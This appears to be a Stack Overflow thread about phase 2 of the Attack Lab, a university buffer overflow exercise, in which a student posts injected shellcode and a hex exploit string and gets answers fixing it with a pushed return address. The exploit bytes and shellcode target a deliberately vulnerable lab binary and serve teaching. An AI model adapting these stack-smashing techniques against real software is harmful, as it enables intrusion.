问题
I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten to the point where the output says that its a valid solution for phase 2, but then it says I caused a seg fault and then says I failed the phase.
This is the error message I receive
cookie: 0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED
this is my exploit code in assembly
mov1 $0x2d6fc2d5, %rdi
retq
this is what I pass into the program
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()
I've looked at tutorials online and have been working on this for hours, but I haven't found a solution and I'm not sure what's causing the issue. It says the solution is valid, but then seg faults and fails. Any help would be greatly appreciated and let me know if there's anything that needs clarifying!
回答1:
It seems the attack lab has been tweaked recently. You should avoid overwrite the next part of the return address in stack
Instead, you can use push instruction to add values to the stack. Try remove touch2 address from the input and use following code.
mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret
回答2:
Printing the "valid solution" line is equivalent to running your unauthorized code, so imo you've already beaten the challenge regardless of the seg fault.
I believe you have too much padding. The buffer is probably 24 char and you've got 6 lines of buffer, so I'm guessing you are going past rsp, jumping to somewhere invalid, causing a segfault.
来源:https://stackoverflow.com/questions/53255874/buffer-overflow-attack-the-attack-lab-phase-2